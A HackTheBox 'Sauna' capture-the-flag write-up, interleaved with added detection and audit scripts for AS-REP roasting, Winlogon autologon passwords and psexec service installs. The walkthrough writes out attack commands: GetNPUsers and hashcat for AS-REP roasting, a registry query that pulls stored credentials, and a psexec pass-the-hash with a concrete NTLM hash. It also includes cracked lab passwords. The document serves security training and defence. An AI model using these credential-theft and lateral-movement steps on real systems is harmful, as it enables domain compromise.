Sauna HTB Writeup
User
After running nmap, these ports are open:
First I add the domain EGOTISTICALBANK to /etc/hosts, since I may need it later. The first thing I do is visit the website. After a bit of enumeration, all I can get from the website is a bunch of usernames from these pages:
Enumerating the LDAP port, I get nothing more than the hostname, which I already know.
Running enum4linux also does not give me much.
smbmap gives me nothing either. After a bit of research I find out that companies use account username naming conventions, so maybe I can build candidate usernames from the names I found and try them with some tools, since several of the open ports let me specify a username without a password at first.
I read about AD user naming conventions and then try the candidate usernames against an impacket tool. The tool I use is called GetNPUsers; it queries the target domain for users with 'Do not require Kerberos preauthentication' set and exports their TGTs for cracking. After a lot of trial and error I find that the user is fsmith.
/opt/impacket/examples/GetNPUsers.py EGOTISTICALBANK/fsmith -dc-ip 10.10.10.175 -request
This gives me the user's TGT, which I can crack.
hashcat -m 13100 crackme.hash /usr/share/wordlists/rockyou.txt
And I find the password: Thestrokes23
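The GetNPUsers step above leaves a distinctive footprint on the domain controller, so here is the defender's side of it, as an added example that is not part of the original writeup. Windows Security event 4768 ("A Kerberos authentication ticket (TGT) was requested") records the Pre-Authentication Type and the Ticket Encryption Type of every AS-REQ. A TGT that was actually issued (Result Code 0x0) to a request carrying no pre-authentication data (type 0) and encrypted with RC4-HMAC (0x17) is exactly what an AS-REP roasting tool asks for. The event bodies below are constructed sample data, not real logs, and the realm, client addresses and the `accounts_without_preauth` helper are assumptions made for the example; the only thing taken from the page is the account name fsmith.

```python
import re

# Constructed sample bodies of Windows Security event 4768 ("A Kerberos
# authentication ticket (TGT) was requested"); not real log data. Three records:
#   1. a normal first-round AS-REQ rejected with KDC_ERR_PREAUTH_REQUIRED (0x19),
#      which is why "no pre-auth" alone is not a signal;
#   2. a normal pre-authenticated request (PA-ENC-TIMESTAMP, type 2) answered with AES;
#   3. a request with no pre-authentication answered with an RC4-HMAC (0x17) ticket,
#      the shape left by tools that collect crackable AS-REPs.
SAMPLE_EVENTS = """\
Event ID: 4768
Account Name: jdoe
Supplied Realm Name: EXAMPLE.LOCAL
Client Address: ::ffff:192.0.2.20
Ticket Encryption Type: 0xFFFFFFFF
Pre-Authentication Type: -
Result Code: 0x19

Event ID: 4768
Account Name: jdoe
Supplied Realm Name: EXAMPLE.LOCAL
Client Address: ::ffff:192.0.2.20
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2
Result Code: 0x0

Event ID: 4768
Account Name: fsmith
Supplied Realm Name: EXAMPLE.LOCAL
Client Address: ::ffff:192.0.2.77
Ticket Encryption Type: 0x17
Pre-Authentication Type: 0
Result Code: 0x0
"""

# userAccountControl bit for "Do not require Kerberos preauthentication"
DONT_REQ_PREAUTH = 0x400000

FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z -]*?):\s*(.*?)\s*$")


def parse_events(text):
    """Split blank-line-separated event bodies into one dict of fields each."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group(1)] = m.group(2)
        if fields:
            events.append(fields)
    return events


def is_asrep_roast(ev):
    """True for a successful TGT request made without pre-auth for an RC4 ticket."""
    return (
        ev.get("Event ID") == "4768"
        and ev.get("Result Code") == "0x0"            # ticket actually issued
        and ev.get("Pre-Authentication Type") == "0"  # client sent no pre-auth data
        and ev.get("Ticket Encryption Type", "").lower() == "0x17"  # RC4-HMAC
    )


def find_asrep_roasting(text):
    """Return (account, client address) for every roasting-shaped event."""
    return [
        (ev.get("Account Name"), ev.get("Client Address"))
        for ev in parse_events(text)
        if is_asrep_roast(ev)
    ]


def accounts_without_preauth(accounts):
    """Given (sAMAccountName, userAccountControl) pairs, return the exposed ones.

    This is the preventive check: any account listed here can be roasted at will.
    """
    return [name for name, uac in accounts if uac & DONT_REQ_PREAUTH]


if __name__ == "__main__":
    for account, client in find_asrep_roasting(SAMPLE_EVENTS):
        print(f"AS-REP roasting suspected: {account} requested from {client}")
    # Constructed directory sample: 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    sample_dir = [("jdoe", 0x10200), ("fsmith", 0x10200 | DONT_REQ_PREAUTH)]
    print("accounts with pre-auth disabled:", accounts_without_preauth(sample_dir))
```

The first sample record shows why the Result Code check matters: every Windows client's first AS-REQ is sent without pre-authentication and is answered with 0x19, so pre-auth type 0 on its own is constant noise. The fix on the directory side is simply to clear the flag on any account `accounts_without_preauth` reports.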
I do a full port scan with verbose output on nmap to check whether Windows Remote Management is enabled. After finding that it is, I use evil-winrm and connect by providing the username fsmith and the cracked password.
root
From there I run WinPEAS or any other enumeration script and find a hidden password inside this registry key:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
The password belongs to the user svc_loanmgr: Moneymakestheworldgoround!
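The Winlogon key gives up that password because Windows autologon stores the DefaultPassword value in cleartext, readable by any local user. The following is an added audit example, not code from the writeup: it parses the output of the `reg query` command shown above and reports the two conditions a defender cares about, a stored DefaultPassword and AutoAdminLogon being switched on. The registry dump is constructed sample output with made-up domain, user and password values; only the key path comes from the page.

```python
import re

# Constructed sample output of `reg query` against the Winlogon key.
# The account and password values are made up for this example.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    Shell    REG_SZ    explorer.exe
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EXAMPLE
    DefaultUserName    REG_SZ    svc_example
    DefaultPassword    REG_SZ    NotARealPassword123
"""

# One value line: <indent><name><spaces><REG_TYPE><spaces><data>
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*?)\s*$")


def parse_reg_query(text):
    """Map each value name to a (type, data) tuple; the key header line is skipped."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3))
    return values


def autologon_findings(values):
    """Return human-readable findings for autologon credential exposure."""
    findings = []
    if "DefaultPassword" in values:
        # A stored password is a finding on its own, even if autologon is off.
        user = values.get("DefaultUserName", ("", "<unset>"))[1]
        domain = values.get("DefaultDomainName", ("", ""))[1]
        account = f"{domain}\\{user}" if domain else user
        findings.append(f"cleartext DefaultPassword stored for {account}")
    if values.get("AutoAdminLogon", ("", "0"))[1] == "1":
        findings.append("AutoAdminLogon is enabled")
    return findings


if __name__ == "__main__":
    for finding in autologon_findings(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print("FINDING:", finding)
```

The remediation is the obvious one: clear DefaultPassword and set AutoAdminLogon to 0, and never configure autologon with an account that holds any domain privilege.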
I log in again using evil-winrm.
I generate a reverse shell with metasploit and run it, which gives me a cmd shell. I then upload mimikatz and get the Administrator NTLM hash, which I use with psexec to get a shell as nt authority\system.
psexec.py administrator@10.10.10.175 -hashes :d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file TkxHqRZj.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service Pntp on 10.10.10.175.....
[*] Starting service Pntp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
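The psexec output above spells out its own detection opportunity: a binary with a random name is written to ADMIN$ (i.e. directly into the Windows directory) and registered as a service with a random short name, which the System log records as event 7045 ("A service was installed in the system"). The following is an added detection example written for this page, not the author's or impacket's code. It parses 7045 event bodies and flags services whose binary lives directly in the Windows root and is not on an allowlist, adding a confidence boost when the file name looks machine-generated. The sample events are constructed; the service name Pntp and file name TkxHqRZj.exe are taken from the output on the page, while the Sysmon and MyAppSvc records and the `looks_random` heuristic are assumptions for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample bodies of System event 7045; not real log data.
# Record 1 is a legitimate tool that also installs into the Windows root
# (the classic false positive), record 2 mirrors the psexec run on the page,
# record 3 is an ordinary application service under Program Files.
SAMPLE_7045 = r"""
Event ID: 7045
Service Name: Sysmon64
Service File Name: C:\Windows\Sysmon64.exe
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem

Event ID: 7045
Service Name: Pntp
Service File Name: %systemroot%\TkxHqRZj.exe
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem

Event ID: 7045
Service Name: MyAppSvc
Service File Name: "C:\Program Files\MyApp\myappsvc.exe"
Service Type: user mode service
Service Start Type: auto start
Service Account: NT AUTHORITY\NetworkService
"""

# Known-good binaries that legitimately sit directly in %SystemRoot% (assumed list).
ALLOWLIST = {"sysmon.exe", "sysmon64.exe"}

FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z -]*?):\s*(.*?)\s*$")


def parse_events(text):
    """Split blank-line-separated event bodies into one dict of fields each."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group(1)] = m.group(2)
        if fields:
            events.append(fields)
    return events


def normalize_image_path(raw):
    """Strip quotes and expand %SystemRoot%/%windir% so paths compare equal."""
    path = raw.strip().strip('"')
    path = re.sub(r"%(systemroot|windir)%", r"C:\\Windows", path, flags=re.IGNORECASE)
    return PureWindowsPath(path)


def looks_random(stem):
    """Heuristic: 8+ letters only, with frequent case changes (e.g. TkxHqRZj)."""
    if len(stem) < 8 or not stem.isalpha():
        return False
    changes = sum(1 for a, b in zip(stem, stem[1:]) if a.isupper() != b.isupper())
    return changes >= 4


def find_suspicious_installs(text):
    """Return (service name, normalized path, random-looking?) for flagged 7045 events."""
    findings = []
    for ev in parse_events(text):
        if ev.get("Event ID") != "7045":
            continue
        path = normalize_image_path(ev.get("Service File Name", ""))
        in_windows_root = str(path.parent).lower() == r"c:\windows"
        if in_windows_root and path.name.lower() not in ALLOWLIST:
            findings.append((ev.get("Service Name"), str(path), looks_random(path.stem)))
    return findings


if __name__ == "__main__":
    for name, path, random_name in find_suspicious_installs(SAMPLE_7045):
        confidence = "high" if random_name else "medium"
        print(f"[{confidence}] service {name!r} installed from {path}")
```

In practice this rule is paired with Security event 5145 showing a write to the ADMIN$ share from the same client a moment earlier, and with the 7045 service being deleted again seconds later; the placement check here is the cheap first filter that survives impacket's per-run random names.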